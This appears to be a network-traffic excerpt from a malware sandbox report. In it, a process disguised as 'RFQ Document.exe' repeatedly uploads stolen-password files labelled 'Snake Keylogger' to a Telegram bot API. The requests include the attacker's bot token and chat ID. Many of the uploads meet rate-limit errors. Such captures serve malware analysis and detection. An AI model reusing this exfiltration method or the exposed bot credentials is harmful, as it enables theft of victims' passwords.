2021-09-28 05:59:17 UTC	328	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 36 36 62 31 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e366b155Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:17 UTC	328	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:17 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:17 UTC	329	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12795,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808757,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
206	192.168.2.4	50027	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:17 UTC	329	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e385affe Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:17 UTC	330	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 38 35 61 66 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e385affeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:17 UTC	330	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:17 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:17 UTC	330	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
207	192.168.2.4	50028	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:17 UTC	330	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e39d86f0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 39 64 38 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e39d86f0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:17 UTC	331	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:17 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:17 UTC	332	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
208	192.168.2.4	50029	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:17 UTC	332	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e3b2fc82 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:17 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 62 32 66 63 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e3b2fc82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:17 UTC	332	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:17 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:17 UTC	333	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
209	192.168.2.4	50030	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:17 UTC	333	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e3c3ab75 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:17 UTC	333	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 63 33 61 62 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e3c3ab75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:17 UTC	334	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:17 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:17 UTC	334	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49795	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:24 UTC	33	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c452b1bf Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:24 UTC	33	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 35 32 62 31 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c452b1bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:24 UTC	34	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:24 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:24 UTC	34	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12601,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
210	192.168.2.4	50031	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:17 UTC	334	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e3d92132 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:17 UTC	334	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 64 39 32 31 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e3d92132Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:17 UTC	335	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:17 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:17 UTC	335	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
211	192.168.2.4	50032	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:18 UTC	335	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e3f0fa00 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:18 UTC	336	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 66 30 66 61 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e3f0fa00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:26 UTC	336	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:26 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:26 UTC	336	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
212	192.168.2.4	50033	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:26 UTC	336	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e8ea1fc9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:26 UTC	337	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 38 65 61 31 66 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e8ea1fc9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:29 UTC	337	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
